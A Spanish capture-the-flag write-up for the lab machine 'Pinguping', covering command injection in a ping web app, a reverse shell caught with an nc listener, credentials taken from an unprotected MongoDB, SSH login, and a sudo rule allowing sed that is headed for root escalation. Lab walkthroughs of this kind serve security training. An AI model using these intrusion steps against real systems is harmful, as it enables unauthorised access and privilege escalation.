Vamos a realizar un segundo escaneo para determinar el servicio y versión misma:
Vamos a ver la aplicación web:
Vemos que es la página predeterminada cuando te instalas Apache2, vamos a realizar fuzzing:
Vemos el directorio web vamos a ver que contiene:
Vemos que nos está indicando de que podría existir una “limpieza del sistema automática”. No vemos nada más relevante, así que vamos a ver que hay en el puerto 5000:
Shell as tester
Vemos que tenemos una aplicación web encargada de enviar un ping a la IP que le indiquemos, vamos a probar a indicarle la 127.0.0.1:
Esto es crítico ya que podríamos abusar de esta función para hacer un SSRF y encontrar puertos locales en la máquina. También una posibilidad es un Command Injection, ya que puede estar empleando el propio ping del sistema, cuya salida ya lo delata. Vamos poner lo siguiente:
Vemos que es vulnerable a un Command Injection, vamos a enviarnos una reverse shell:
Me pondré en escucha:
Vamos a enviarnos una reverse shell:
Ya tenemos acceso a la máquina!! Vamos a hacer un ls -la:
Vemos la carpeta .mongodb vamos a acceder a ella:
Vemos otro directorio llamado mongosh vamos a acceder:
Vamos a haceder a mongodb ejecutando mongosh:
Vamos a apuntar a endpoint secretito con use:
Ahora buscaremos por la tabla usuarios con el comando almacenado en el histórico:
Obtuvimos las credenciales de un usuario llamado secretote, vamos a ver si existe en el sistema:
Vemos que existe, vamos a acceder por SSH:
Shell as root
Ahora como usuario secretote vamos a ver si tenemos permisos SUDOERS:
Si buscamos el binario por GTFObins nos dan lo siguiente:
┌──(pylon㉿kali)-[~/…/pylon/THL/Pinguping/nmap]
└─$ rlwrap nc -nlvp 9090
listening on [any] 9090 ...
connect to [192.168.44.128] from (UNKNOWN) [192.168.44.134] 50058
bash: no se puede establecer el grupo de proceso de terminal (733): Función ioctl no apropiada para el dispositivo
bash: no hay control de trabajos en este shell
tester@pinguping:~$
tester@pinguping:~$ ls -la
total 36
drwx------ 5 tester tester 4096 may 20 2024 .
drwxr-xr-x 5 root root 4096 may 19 2024 ..
lrwxrwxrwx 1 root root 9 may 20 2024 .bash_history -> /dev/null
-rw-r--r-- 1 tester tester 220 may 19 2024 .bash_logout
-rw-r--r-- 1 tester tester 3526 may 19 2024 .bashrc
drwxr-xr-x 3 tester tester 4096 may 19 2024 Desktop
drwxr-xr-x 3 tester tester 4096 may 19 2024 .local
drwx------ 3 tester tester 4096 may 19 2024 .mongodb
-rw-r--r-- 1 tester tester 807 may 19 2024 .profile
-rw-r--r-- 1 tester tester 66 may 19 2024 .selected_editor
tester@pinguping:~/.mongodb$ ls -la
total 12
drwx------ 3 tester tester 4096 may 19 2024 .
drwx------ 5 tester tester 4096 may 20 2024 ..
drwx------ 3 tester tester 4096 jul 20 22:59 mongosh
tester@pinguping:~/.mongodb/mongosh$ mongosh
Current Mongosh Log ID: 687d5ffb2021ae71842202d7
Connecting to: mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000&appName=mongosh+2.2.5
Using MongoDB: 7.0.9
Using Mongosh: 2.2.5
mongosh 2.5.6 is available for download: https://www.mongodb.com/try/download/shell
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
------
The server generated these startup warnings when booting
2025-07-20T23:18:50.507+02:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
2025-07-20T23:18:50.737+02:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
2025-07-20T23:18:50.737+02:00: /sys/kernel/mm/transparent_hugepage/enabled is 'always'. We suggest setting it to 'never' in this binary version
2025-07-20T23:18:50.737+02:00: vm.max_map_count is too low
------
test>
┌──(pylon㉿kali)-[~]
└─$ ssh secretote@192.168.44.134
secretote@192.168.44.134's password:
Linux pinguping 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 20 22:57:38 2025 from 192.168.44.128
secretote@pinguping:~$
secretote@pinguping:~$ sudo -l
[sudo] contraseña para secretote:
Matching Defaults entries for secretote on pinguping:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User secretote may run the following commands on pinguping:
(ALL : ALL) /usr/bin/sed